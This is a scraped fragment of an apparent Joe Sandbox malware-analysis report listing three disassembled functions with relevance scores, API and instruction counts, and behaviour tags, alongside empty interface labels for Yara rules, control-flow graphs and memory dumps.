Function 0040ADD6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40libraryloaderCOMMON
Download Yara Rule
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00409A1F Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 395memorypipesynchronizationCOMMON
Download Yara Rule
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401000 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 108memoryCOMMON
Download Yara Rule
Control-flow Graph
APIs |
|